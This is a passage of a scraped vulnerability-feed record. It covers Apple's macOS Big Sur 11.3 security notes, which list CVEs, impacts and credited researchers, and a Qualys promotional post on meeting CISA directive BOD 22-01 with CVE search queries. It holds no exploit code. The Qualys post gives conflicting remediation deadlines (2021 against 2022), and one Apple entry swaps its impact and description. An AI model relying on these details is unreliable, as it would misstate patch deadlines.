Security\n\nEntry added May 28, 2021\n\n**smbx**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker in a privileged network position may be able to leak sensitive user information\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2021-1878: Aleksandar Nikolic of Cisco Talos (talosintelligence.com)\n\n**System Preferences**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-30657: Cedric Owens (@cedowens)\n\nEntry added April 27, 2021, updated April 30, 2021\n\n**TCC**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious unsandboxed app on a system with Remote Login enabled may bypass Privacy preferences\n\nDescription: This issue was addressed by adding a new Remote Login option for opting into Full Disk Access for Secure Shell sessions.\n\nCVE-2021-30856: Csaba Fitzl (@theevilbit) of Offensive Security, Andy Grant of Zoom Video Communications, Thijs Alkemade of Computest Research Division, Wojciech Regu\u0142a of SecuRing (wojciechregula.blog), Cody Thomas of SpecterOps, Mickey Jin of Trend Micro\n\nEntry added January 19, 2022, updated May 25, 2022 \n\n**tcpdump**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-8037: an anonymous researcher\n\n**Time Machine**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications and Gary Nield of ECSC Group plc\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2021-1825: Alex Camboe of Aon\u2019s Cyber Solutions\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1817: zhunki\n\nEntry updated May 6, 2021\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1826: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1820: Andr\u00e9 Bargull\n\nEntry updated May 6, 2021\n\n**WebKit Storage**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-30661: yangkang(@dnpushme) of 360 ATA\n\n**WebRTC**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-7463: Megan2013678\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1829: Tielei Wang of Pangu Lab\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-30655: Gary Nield of ECSC Group plc and Tim Michaud(@TimGMichaud) of Zoom Video Communications and Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: A logic issue was addressed with improved state management\n\nDescription: A buffer overflow may result in arbitrary code execution.\n\nCVE-2021-1770: Jiska Classen (@naehrdine) of Secure Mobile Networking Lab, TU Darmstadt\n\nEntry added July 21, 2021 \n\n**WindowServer**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to unexpectedly leak a user's credentials from secure text fields\n\nDescription: An API issue in Accessibility TCC permissions was addressed with improved state management.\n\nCVE-2021-1873: an anonymous researcher\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge @maxzks for their assistance.\n\nEntry added May 6, 2021\n\n**CoreAudio**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**CoreCrypto**\n\nWe would like to acknowledge Andy Russon of Orange Group for their assistance.\n\nEntry added May 6, 2021\n\n**File Bookmark**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Foundation**\n\nWe would like to acknowledge CodeColorist of Ant-Financial LightYear Labs for their assistance.\n\nEntry added May 6, 2021\n\n**Kernel**\n\nWe would like to acknowledge Antonio Frighetto of Politecnico di Milano, GRIMM, Keyu Man, Zhiyun Qian, Zhongjie Wang, Xiaofeng Zheng, Youjun Huang, Haixin Duan, Mikko Kentt\u00e4l\u00e4 ( @Turmio_ ) of SensorFu, and Proteas for their assistance.\n\nEntry added May 6, 2021\n\n**Mail**\n\nWe would like to acknowledge Petter Flink, SecOps of Bonnier News and an anonymous researcher for their assistance.\n\nEntry added May 6, 2021\n\n**Safari**\n\nWe would like to acknowledge Sahil Mehra (Nullr3x) & Shivam Kamboj Dattana (Sechunt3r) for their assistance.\n\nEntry added May 6, 2021\n\n**Security**\n\nWe would like to acknowledge Xingwei Lin of Ant Security Light-Year Lab and john (@nyan_satan) for their assistance.\n\nEntry added May 6, 2021\n\n**sysdiagnose**\n\nWe would like to acknowledge Tim Michaud (@TimGMichaud) of Leviathan for their assistance.\n\nEntry added May 6, 2021\n\n**WebKit**\n\nWe would like to acknowledge Emilio Cobos \u00c1lvarez of Mozilla for their assistance.\n\nEntry added May 6, 2021\n\n**WebSheet**\n\nWe would like to acknowledge Patrick Clover for their assistance.\n\nEntry added May 6, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7463", "CVE-2020-8037", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1770", "CVE-2021-1784", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1814", "CVE-2021-1815", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1824", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1828", "CVE-2021-1829", "CVE-2021-1832", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1849", "CVE-2021-1851", "CVE-2021-1853", "CVE-2021-1855", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1859", "CVE-2021-1860", "CVE-2021-1861", "CVE-2021-1867", "CVE-2021-1868", "CVE-2021-1872", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1880", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-1883", "CVE-2021-1884", "CVE-2021-1885", "CVE-2021-30652", "CVE-2021-30653", "CVE-2021-30655", "CVE-2021-30657", "CVE-2021-30658", "CVE-2021-30659", "CVE-2021-30660", "CVE-2021-30661", "CVE-2021-30664", "CVE-2021-30743", "CVE-2021-30750", "CVE-2021-30752", "CVE-2021-30856"], "modified": "2021-04-26T00:00:00", "id": "APPLE:2A32C0762786DF36357D645066CDC600", "href": "https://support.apple.com/kb/HT212325", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture1.jpg)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture3.png)\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture4.png)\n\n### Summary Dashboard High Level Structured by Vendor:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture5.png)\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

New AdLoad Variant Bypasses Apple's Security Defenses to Target macOS Systems

Description

Related